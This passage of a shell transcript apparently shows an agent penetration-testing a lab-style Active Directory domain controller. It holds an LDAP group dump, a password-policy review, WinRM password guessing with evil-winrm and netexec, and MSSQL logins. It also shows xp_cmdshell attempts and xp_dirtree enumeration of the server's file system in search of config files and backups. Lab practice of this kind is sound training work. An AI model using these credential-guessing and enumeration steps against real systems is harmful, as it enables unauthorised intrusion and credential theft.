"CN=SQLServer2005SQLBrowserUser$DC01,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members in the group have the required access and privileges to be assigned as the log on account for the associated instance of SQL Server Browser." ] } { "name": "DnsUpdateProxy", "distinguishedName": "CN=DnsUpdateProxy,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers)." ] } { "name": "DnsAdmins", "distinguishedName": "CN=DnsAdmins,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "DNS Administrators Group" ] } { "name": "Enterprise Key Admins", "distinguishedName": "CN=Enterprise Key Admins,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members of this group can perform administrative actions on key objects within the forest." ] } { "name": "Key Admins", "distinguishedName": "CN=Key Admins,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members of this group can perform administrative actions on key objects within the domain." ] } { "name": "Protected Users", "distinguishedName": "CN=Protected Users,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information." ] } { "name": "Cloneable Domain Controllers", "distinguishedName": "CN=Cloneable Domain Controllers,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members of this group that are domain controllers may be cloned." ] } { "name": "Enterprise Read-only Domain Controllers", "distinguishedName": "CN=Enterprise Read-only Domain Controllers,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members of this group are Read-Only Domain Controllers in the enterprise" ] } { "name": "Read-only Domain Controllers", "distinguishedName": "CN=Read-only Domain Controllers,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members of this group are Read-Only Domain Controllers in the domain" ] } { "name": "Denied RODC Password Replication Group", "distinguishedName": "CN=Denied RODC Password Replication Group,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": [ "CN=Read-only Domain Controllers,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=Group Policy Creator Owners,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=Domain Admins,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=Cert Publishers,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=Enterprise Admins,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=Schema Admins,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=Domain Controllers,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=krbtgt,CN=Users,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain" ] } { "name": "Allowed RODC Password Replication Group", "distinguishedName": "CN=Allowed RODC Password Replication Group,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members in this group can have their passwords replicated to all read-only domain controllers in the domain" ] } { "name": "Terminal Server License Servers", "distinguishedName": "CN=Terminal Server License Servers,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members of this group can update user accounts in Active Directory with information about license issuance, for the purpose of tracking and reporting TS Per User CAL usage" ] } { "name": "Windows Authorization Access Group", "distinguishedName": "CN=Windows Authorization Access Group,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": [ "CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Members of this group have access to the computed tokenGroupsGlobalAndUniversal attribute on User objects" ] } { "name": "Incoming Forest Trust Builders", "distinguishedName": "CN=Incoming Forest Trust Builders,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members of this group can create incoming, one-way trusts to this forest" ] } { "name": "Pre-Windows 2000 Compatible Access", "distinguishedName": "CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": [ "CN=DC01,OU=Domain Controllers,DC=[REDACTED],DC=[REDACTED]", "CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "A backward compatibility group which allows read access on all users and groups in the domain" ] } { "name": "Account [REDACTED]", "distinguishedName": "CN=Account [REDACTED],CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members can administer domain user and group accounts" ] } { "name": "Server [REDACTED]", "distinguishedName": "CN=Server [REDACTED],CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members can administer domain servers" ] } { "name": "RAS and IAS Servers", "distinguishedName": "CN=RAS and IAS Servers,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Servers in this group can access remote access properties of users" ] } { "name": "Group Policy Creator Owners", "distinguishedName": "CN=Group Policy Creator Owners,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": [ "CN=Administrator,CN=Users,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Members in this group can modify group policy for the domain" ] } { "name": "Domain Guests", "distinguishedName": "CN=Domain Guests,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "All domain guests" ] } { "name": "Domain Users", "distinguishedName": "CN=Domain Users,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "All domain users" ] } { "name": "Domain Admins", "distinguishedName": "CN=Domain Admins,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": [ "CN=Administrator,CN=Users,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Designated administrators of the domain" ] } { "name": "Cert Publishers", "distinguishedName": "CN=Cert Publishers,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": [ "CN=DC01,OU=Domain Controllers,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Members of this group are permitted to publish certificates to the directory" ] } { "name": "Enterprise Admins", "distinguishedName": "CN=Enterprise Admins,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": [ "CN=Administrator,CN=Users,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Designated administrators of the enterprise" ] } { "name": "Schema Admins", "distinguishedName": "CN=Schema Admins,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": [ "CN=Administrator,CN=Users,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Designated administrators of the schema" ] } { "name": "Domain Controllers", "distinguishedName": "CN=Domain Controllers,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "All domain controllers in the domain" ] } { "name": "Domain Computers", "distinguishedName": "CN=Domain Computers,CN=Users,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "All workstations and servers joined to the domain" ] } { "name": "Storage Replica Administrators", "distinguishedName": "CN=Storage Replica Administrators,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members of this group have complete and unrestricted access to all features of Storage Replica." ] } { "name": "Remote Management Users", "distinguishedName": "CN=Remote Management Users,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": [ "CN=[REDACTED],CN=Users,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user." ] } { "name": "Access Control Assistance [REDACTED]", "distinguishedName": "CN=Access Control Assistance [REDACTED],CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members of this group can remotely query authorization attributes and permissions for resources on this computer." ] } { "name": "Hyper-V Administrators", "distinguishedName": "CN=Hyper-V Administrators,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members of this group have complete and unrestricted access to all features of Hyper-V." ] } { "name": "RDS Management Servers", "distinguishedName": "CN=RDS Management Servers,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Servers in this group can perform routine administrative actions on servers running Remote Desktop Services. This group needs to be populated on all servers in a Remote Desktop Services deployment. The servers running the RDS Central M anagement service must be included in this group." ] } { "name": "RDS Endpoint Servers", "distinguishedName": "CN=RDS Endpoint Servers,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Servers in this group run virtual machines and host sessions where users RemoteApp programs and personal virtual desktops run. This group needs to be populated on servers running RD Connection Broker. RD Session Host servers and RD Vir tualization Host servers used in the deployment need to be in this group." ] } { "name": "RDS Remote Access Servers", "distinguishedName": "CN=RDS Remote Access Servers,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Servers in this group enable users of RemoteApp programs and personal virtual desktops access to these resources. In Internet-facing deployments, these servers are typically deployed in an edge network. This group needs to be populated on servers running RD Connection Broker. RD Gateway servers and RD Web Access servers used in the deployment need to be in this group." ] } { "name": "Certificate Service DCOM Access", "distinguishedName": "CN=Certificate Service DCOM Access,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": [ "CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Members of this group are allowed to connect to Certification Authorities in the enterprise" ] } { "name": "Event Log Readers", "distinguishedName": "CN=Event Log Readers,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members of this group can read event logs from local machine" ] } { "name": "Cryptographic [REDACTED]", "distinguishedName": "CN=Cryptographic [REDACTED],CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members are authorized to perform cryptographic operations." ] } { "name": "IISIUSRS", "distinguishedName": "CN=IISIUSRS,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": [ "CN=S-1-5-17,CN=ForeignSecurityPrincipals,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Built-in group used by Internet Information Services." ] } { "name": "Distributed COM Users", "distinguishedName": "CN=Distributed COM Users,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members are allowed to launch, activate and use Distributed COM objects on this machine." ] } { "name": "Performance Log Users", "distinguishedName": "CN=Performance Log Users,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members of this group may schedule logging of performance counters, enable trace providers, and collect event traces both locally and via remote access to this computer" ] } { "name": "Performance Monitor Users", "distinguishedName": "CN=Performance Monitor Users,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members of this group can access performance counter data locally and remotely" ] } { "name": "Network Configuration [REDACTED]", "distinguishedName": "CN=Network Configuration [REDACTED],CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members in this group can have some administrative privileges to manage configuration of networking features" ] } { "name": "Remote Desktop Users", "distinguishedName": "CN=Remote Desktop Users,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members in this group are granted the right to logon remotely" ] } { "name": "Replicator", "distinguishedName": "CN=Replicator,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Supports file replication in a domain" ] } { "name": "Backup [REDACTED]", "distinguishedName": "CN=Backup [REDACTED],CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Backup [REDACTED] can override security restrictions for the sole purpose of backing up or restoring files" ] } { "name": "Print [REDACTED]", "distinguishedName": "CN=Print [REDACTED],CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": null, "description": [ "Members can administer printers installed on domain controllers" ] } { "name": "Guests", "distinguishedName": "CN=Guests,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": [ "CN=Domain Guests,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=Guest,CN=Users,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Guests have the same access as members of the Users group by default, except for the Guest account which is further restricted" ] } { "name": "Users", "distinguishedName": "CN=Users,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": [ "CN=Domain Users,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=[REDACTED],DC=[REDACTED]", "CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Users are prevented from making accidental or intentional system-wide changes and can run most applications" ] } { "name": "Administrators", "distinguishedName": "CN=Administrators,CN=Builtin,DC=[REDACTED],DC=[REDACTED]", "member": [ "CN=Domain Admins,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=Enterprise Admins,CN=Users,DC=[REDACTED],DC=[REDACTED]", "CN=Administrator,CN=Users,DC=[REDACTED],DC=[REDACTED]" ], "description": [ "Administrators have complete and unrestricted access to the computer/domain" ] } shell:~$ # Check domain computers to understand the environment structure shell:~$ cat ./ldap/domaincomputers.json | jq '.[] | {name: .attributes.name[0], distinguishedName: .attributes.distinguishedName[0], operatingSystem: .attributes.operatingSystem?, servicePrincipalName: .attributes.servicePrincipalName?}' | head -20 { "name": "DC01", "distinguishedName": "CN=DC01,OU=Domain Controllers,DC=[REDACTED],DC=[REDACTED]", "operatingSystem": [ "Windows Server 2019 Standard" ], "servicePrincipalName": [ "Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/dc01.[REDACTED]", "ldap/dc01.[REDACTED]/ForestDnsZones.[REDACTED]", "ldap/dc01.[REDACTED]/DomainDnsZones.[REDACTED]", "DNS/dc01.[REDACTED]", "GC/dc01.[REDACTED]/[REDACTED]", "RestrictedKrbHost/dc01.[REDACTED]", "RestrictedKrbHost/DC01", "RPC/9d5576aa-be27-4760-8b2c-f489cc5bfc3f.msdcs.[REDACTED]", "HOST/DC01/[REDACTED]", "HOST/dc01.[REDACTED]/[REDACTED]", "HOST/DC01", "HOST/dc01.[REDACTED]", "HOST/dc01.[REDACTED]/[REDACTED]", shell:~$ # Check domain policy and trust information to understand security configuration shell:~$ cat ./ldap/domainpolicy.json | jq '.[] | {attribute: .attributes | keys[], value: .attributes[.attributes | keys[]]?}' | head -30 { "attribute": "auditingPolicy", "value": [ "\u0000\u0001" ] } { "attribute": "auditingPolicy", "value": [ "2025-08-01 07:42:28.679365+00:00" ] } { "attribute": "auditingPolicy", "value": [ { "encoded": "AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAqnZVnSe+YEeLLPSJzFv8Pw==", "encoding": "base64" } ] } { "attribute": "auditingPolicy", "value": [ "1601-01-01 00:00:00+00:00" ] } { "attribute": "auditingPolicy", "value": [ jq: error: writing output failed: Broken pipe shell:~$ # Let's extract key security findings from the domain policy shell:~$ cat ./ldap/domainpolicy.json | jq -r '.[] | select(.attributes.lockoutThreshold or .attributes.maxPwdAge or .attributes.minPwdAge or .attributes.minPwdLength or .attributes.pwdHistoryLength) | {lockoutThreshold: .attributes.lockou tThreshold?, maxPwdAge: .attributes.maxPwdAge?, minPwdAge: .attributes.minPwdAge?, minPwdLength: .attributes.minPwdLength?, pwdHistoryLength: .attributes.pwdHistoryLength?}' { "lockoutThreshold": [ 0 ], "maxPwdAge": [ "42 days, 0:00:00" ], "minPwdAge": [ "1 day, 0:00:00" ], "minPwdLength": [ 7 ], "pwdHistoryLength": [ 24 ] } shell:~$ # Check if there are any interesting service principal names or certificate templates that could be exploited shell:~$ cat ./ldap/domaincomputers.json | jq -r '.[] | select(.attributes.servicePrincipalName) | .attributes.servicePrincipalName[]' | grep -i mssql shell:~$ # Analysis complete - Let me test WinRM access with the [REDACTED] user who has Remote Management Users membership shell:~$ echo 'Key findings from LDAP analysis:' Key findings from LDAP analysis: shell:~$ echo '1. [REDACTED] user is member of Remote Management Users group (WinRM access)' 1. [REDACTED] user is member of Remote Management Users group (WinRM access) shell:~$ echo '2. Password policy: 7 char minimum, no lockout threshold (0)' 2. Password policy: 7 char minimum, no lockout threshold (0) shell:~$ echo '3. Only DC01 computer in domain (Windows Server 2019)' 3. Only DC01 computer in domain (Windows Server 2019) shell:~$ echo '4. No MSSQL SPNs found on domain computers' 4. No MSSQL SPNs found on domain computers shell:~$ echo '5. Standard AD Certificate Services groups present' 5. Standard AD Certificate Services groups present shell:~$ echo 'Testing WinRM access with discovered users...' Testing WinRM access with discovered users... shell:~$ # Test WinRM access with [REDACTED] user using common passwords shell:~$ evil-winrm -i 10.129.209.100 -u [REDACTED] -p [REDACTED] Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quotingdetectionproc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError Error: Exiting with code 1 shell:~$ # Try other common passwords for [REDACTED] user shell:~$ evil-winrm -i 10.129.209.100 -u [REDACTED] -p password Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quotingdetectionproc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint Killed shell:~$ ^C shell:~$ # The user wants you to pivot the assessment, starting with the instruction below. shell:~$ # Try testing other users with WinRM since [REDACTED] failed shell:~$ evil-winrm -i 10.129.209.100 -u [REDACTED] -p [REDACTED] # creds are [REDACTED]:[REDACTED] for mssql Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quotingdetectionproc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError Error: Exiting with code 1 shell:~$ # Test MSSQL access with the discovered credentials [REDACTED]:[REDACTED] shell:~$ mssqlclient.py -windows-auth [REDACTED]/[REDACTED]:[REDACTED]@[REDACTED] /opt/venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkgresources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkgresources.html. The pkgresources package is slated for removal as early as 2025 -11-30. Refrain from using this package or pin to Setuptools # Successfully connected to MSSQL with [REDACTED]:[REDACTED] credentials! Let's enumerate the database ERROR(DC01\SQLEXPRESS): Line 1: Incorrect syntax near 'connected'. ERROR(DC01\SQLEXPRESS): Line 1: Incorrect syntax near the keyword 'with'. If this statement is a common table expression, an xmlnamespaces clause or a change tracking context clause, the previous statement must be terminated with a semicolo n. ERROR(DC01\SQLEXPRESS): Line 1: Unclosed quotation mark after the character string 's enumerate the database '. SQL ([REDACTED]\[REDACTED] guest@master) SELECT name FROM sys.databases; name ------ master [REDACTED] model [REDACTED] SQL ([REDACTED]\[REDACTED] guest@master) # Let's check what privileges we have and enumerate database contents

shell:~$ mssqlclient.py -windows-auth [REDACTED]/[REDACTED]:[REDACTED]@[REDACTED]-q "SELECT ISSRVROLEMEMBER('sysadmin'); SELECT name FROM sys.serverprincipals WHERE typedesc = 'SQLLOGIN' OR typedesc = 'WINDOWSLOGIN'; EXEC xpcmdshell ' whoami';" /opt/venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkgresources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkgresources.html. The pkgresources package is slated for removal as early as 2025 -11-30. Refrain from using this package or pin to Setuptools SELECT ISSRVROLEMEMBER('sysadmin'); - 0 SQL ([REDACTED]\[REDACTED] guest@master) SELECT name FROM sys.serverprincipals WHERE typedesc = 'SQLLOGIN' OR typedesc = 'WINDOWSLOGIN'; name ---- sa SQL ([REDACTED]\[REDACTED] guest@master) EXEC xpcmdshell 'whoami'; ERROR(DC01\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xpcmdshell', database 'mssqlsystemresource', schema 'sys'. SQL ([REDACTED]\[REDACTED] guest@master) SELECT name, isdisabled FROM sys.serverprincipals WHERE typedesc = 'SQLLOGIN' OR typedesc = 'WINDOWSLOGIN'; name isdisabled ---- ----------- sa 1 SQL ([REDACTED]\[REDACTED] guest@master) SELECT name, isdisabled FROM sys.serverprincipals WHERE typedesc = 'SQLLOGIN' OR typedesc = 'WINDOWSLOGIN' OR typedesc = 'WINDOWSGROUP'; name isdisabled ------------- ----------- sa 1 BUILTIN\Users 0 SQL ([REDACTED]\[REDACTED] guest@master) SELECT name, typedesc, isdisabled FROM sys.serverprincipals WHERE type IN ('S', 'U', 'G') ORDER BY typedesc; name typedesc isdisabled ------------- ------------- ----------- sa SQLLOGIN 1 BUILTIN\Users WINDOWSGROUP 0 SQL ([REDACTED]\[REDACTED] guest@master) SELECT DBNAME() AS currentdatabase; SELECT name FROM sys.databases; SQL ([REDACTED][REDACTED] guest@master) SELECT DBNAME() AS currentdatabase; SELECT name FROM sys.databases; SQL ([REDACTED]\[REDACTED] guest@master) SELECT DBNAME() AS currentdatabase; currentdatabase ---------------- master SQL ([REDACTED]\[REDACTED] guest@master) SELECT name FROM sys.databases; name ------ master [REDACTED] model [REDACTED] SQL ([REDACTED]\[REDACTED] guest@master) SELECT FROM sys.fnmypermissions(NULL, 'SERVER'); entityname subentityname permissionname ----------- -------------- ----------------- server CONNECT SQL server VIEW ANY DATABASE SQL ([REDACTED]\[REDACTED] guest@master) USE msdb; SELECT name FROM sys.tables WHERE type = 'U'; ENVCHANGE(DATABASE): Old Value: master, New Value: msdb INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'msdb'. name --------------------------------- dmhadrautomaticseedinghistory backupmediaset backupmediafamily backupset backupfile restorehistory restorefile restorefilegroup logmarkhistory suspectpages SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT TOP 10 name FROM sys.tables WHERE type = 'U'; name --------------------------------- dmhadrautomaticseedinghistory backupmediaset backupmediafamily backupset backupfile restorehistory restorefile restorefilegroup logmarkhistory suspectpages SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT name FROM sys.tables WHERE type = 'U' AND name LIKE '%job%' OR name LIKE '%schedule%' OR name LIKE '%task%' OR name LIKE '%agent%'; name ---- SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT name FROM sys.tables WHERE type = 'U' AND (name LIKE '%job%' OR name LIKE '%schedule%' OR name LIKE '%task%' OR name LIKE '%agent%'); name ---- SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT name FROM sys.tables WHERE type = 'U' ORDER BY name; name --------------------------------- backupfile backupmediafamily backupmediaset backupset dmhadrautomaticseedinghistory logmarkhistory restorefile restorefilegroup restorehistory suspectpages SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT @@version; SELECT SYSTEMUSER; SELECT USERNAME(); SELECT HASPERMSBYNAME(null, null, 'CONTROL SERVER'); ----------- Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) Sep 24 2019 13:48:23 Copyright (C) 2019 Microsoft Corporation Express Edition (64-bit) on Windows Server 2019 Standard 10.0 (Build 17763: ) (Hypervisor) [REDACTED]\[REDACTED] guest 0 SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT HASPERMSBYNAME(null, null, 'IMPERSONATE ANY LOGIN'); SELECT HASPERMSBYNAME('xpcmdshell', 'OBJECT', 'EXECUTE'); SELECT name FROM sys.configurations WHERE name LIKE '%xpcmdshell%'; SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT HASPERMSBYNAME(null, null, 'IMPERSONATE ANY LOGIN'); SELECT HASPERMSBYNAME('xpcmdshell', 'OBJECT', 'EXECUTE'); SELECT name FROM sys.configurations WHERE name LIKE '%xpcmdshell%'; SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT HASPERMSBYNAME(null, null, 'IMPERSONATE ANY LOGIN'); - 0 SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT HASPERMSBYNAME('xpcmdshell', 'OBJECT', 'EXECUTE'); SELECT name FROM sys.configurations WHERE name LIKE '%xpcmdshell%'; SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT HASPERMSBYNAME('xpcmdshell', 'OBJECT', 'EXECUTE'); - 0 SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT name FROM sys.configurations WHERE name LIKE '%xpcmdshell%'; name ----------- xpcmdshell SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT name, value, valueinuse FROM sys.configurations WHERE name = 'xpcmdshell'; SQL ([REDACTED][REDACTED] guest@msdb) SELECT name, value, valueinuse FROM sys.configurations WHERE name = 'xpcmdshell'; SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT name, value, valueinuse FROM sys.configurations WHERE name = 'xpcmdshell'; SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT name, value, valueinuse FROM sys.configurations WHERE name = 'xpcmdshell'; SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT name, value, valueinuse FROM sys.configurations WHERE name = 'xpcmdshell'; SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT name, value, valueinuse FROM sys.configurations WHERE name = 'xpcmdshell'; SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT name, value, valueinuse FROM sys.configurations WHERE name = 'xpcmdshell'; SQL ([REDACTED]\[REDACTED] guest@msdb) SELECT name, value, valueinuse FROM sys.configurations WHERE name = 'xpcmdshell'; SQL ([REDACTED]\[REDACTED] guest@msdb) Killed shell:~$ # MSSQL analysis revealed limited privileges - [REDACTED] account has guest access with no sysadmin or xpcmdshell permissions. Let's check for stored procedures and investigate other database enumeration options shell:~$ mssqlclient.py -windows-auth [REDACTED]/[REDACTED]:[REDACTED]@[REDACTED] /opt/venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkgresources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkgresources.html. The pkgresources package is slated for removal as early as 2025 -11-30. Refrain from using this package or pin to Setuptools Killed shell:~$ # MSSQL enumeration complete - [REDACTED] has limited guest privileges, no sysadmin or xpcmdshell access. Let's test WinRM access with [REDACTED] user who is in Remote Management Users group shell:~$ netexec winrm [REDACTED] -u [REDACTED] -p [REDACTED] WINRM 10.129.209.100 5985 DC01 [] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:[REDACTED]) WINRM 10.129.209.100 5985 DC01 [-] [REDACTED]\[REDACTED]:[REDACTED] shell:~$ ^C shell:~$ # The user wants you to pivot the assessment, starting with the instruction below. shell:~$ # You are doing good. Keep enumerating it. shell:~$ # Need to continue enumeration - let's try different authentication methods for MSSQL and check for additional database content shell:~$ mssqlclient.py -windows-auth [REDACTED]/[REDACTED]:[REDACTED@[REDACTED] /opt/venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkgresources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkgresources.html. The pkgresources package is slated for removal as early as 2025 -11-30. Refrain from using this package or pin to Setuptools SELECT name, value, valueinuse FROM sys.configurations WHERE name IN ('xpcmdshell', 'show advanced options'); SELECT name FROM sys.databases; SELECT name FROM sys.serverprincipals WHERE typedesc = 'WINDOWSLOGIN' AND name LIKE '%[REDACTED]%'; SQL ([REDACTED]\[REDACTED] guest@master) Killed shell:~$ # Reconnecting to MSSQL to execute xpdirtree on C:\inetpub\wwwroot shell:~$ mssqlclient.py -windows-auth [REDACTED]/[REDACTED]:[REDACTED]@[REDACTED] /opt/venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkgresources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkgresources.html. The pkgresources package is slated for removal as early as 2025 -11-30. Refrain from using this package or pin to Setuptools EXEC xpdirtree 'C:\inetpub\wwwroot'; subdirectory depth ------------ ----- css 1 images 1 js 1 SQL ([REDACTED]\[REDACTED] guest@master) EXEC xpdirtree 'C:\inetpub\wwwroot', 2, 1; subdirectory depth file ------------------------------- ----- ---- about.html 1 1 contact.html 1 1 css 1 0 bootstrap.css 2 1 responsive.css 2 1 style.css 2 1 style.css.map 2 1 style.scss 2 1 images 1 0 about-img.png 2 1 bodybg.jpg 2 1 call-o.png 2 1 call.png 2 1 client.jpg 2 1 contact-img.jpg 2 1 envelope-o.png 2 1 envelope.png 2 1 hero-bg.jpg 2 1 location-o.png 2 1 location.png 2 1 logo.png 2 1 menu.png 2 1 next-white.png 2 1 next.png 2 1 offer-img.jpg 2 1 prev-white.png 2 1 prev.png 2 1 quote.png 2 1 s-1.png 2 1 s-2.png 2 1 s-3.png 2 1 s-4.png 2 1 search-icon.png 2 1 index.html 1 1 js 1 0 bootstrap.js 2 1 jquery-3.4.1.min.js 2 1 service.html 1 1 web.config 1 1 website-backup-27-07-23-old.zip 1 1 SQL ([REDACTED]\[REDACTED] guest@master) EXEC xpdirtree 'C:\inetpub\wwwroot\website-backup-27-07-23-old.zip', 1, 1; subdirectory depth file ------------ ----- ---- SQL ([REDACTED]\[REDACTED] guest@master) EXEC xpdirtree 'C:\inetpub\wwwroot\web.config', 1, 1; subdirectory depth file ------------ ----- ---- SQL ([REDACTED]\[REDACTED] guest@master) # Found interesting files: web.config and website-backup-27-07-23-old.zip - let's check if we can read the web.config file for connection strings or credentials ERROR(DC01\SQLEXPRESS): Line 1: Incorrect syntax near 'interesting'. ERROR(DC01\SQLEXPRESS): Line 1: Unclosed quotation mark after the character string 's check if we can read the web.config file for connection strings or credentials '. SQL ([REDACTED]\[REDACTED] guest@master) EXEC xpdirtree 'C:\', 2, 1; subdirectory depth file --------------------------------------------- ----- ---- $Recycle.Bin 1 0 S-1-5-21-4078382237-1492182817-2568127209-500 2 0 Documents and Settings 1 0 inetpub 1 0 custerr 2 0 history 2 0 logs 2 0 temp 2 0 wwwroot 2 0 PerfLogs 1 0 Program Files 1 0 Common Files 2 0 internet explorer 2 0 Microsoft 2 0 Microsoft SQL Server 2 0 Microsoft Visual Studio 10.0 2 0 Microsoft.NET 2 0 PackageManagement 2 0 Uninstall Information 2 0 VMware 2 0 Windows Defender 2 0 Windows Defender Advanced Threat Protection 2 0 Windows Mail 2 0 Windows Media Player 2 0 Windows Multimedia Platform 2 0 windows nt 2 0 Windows Photo Viewer 2 0 Windows Portable 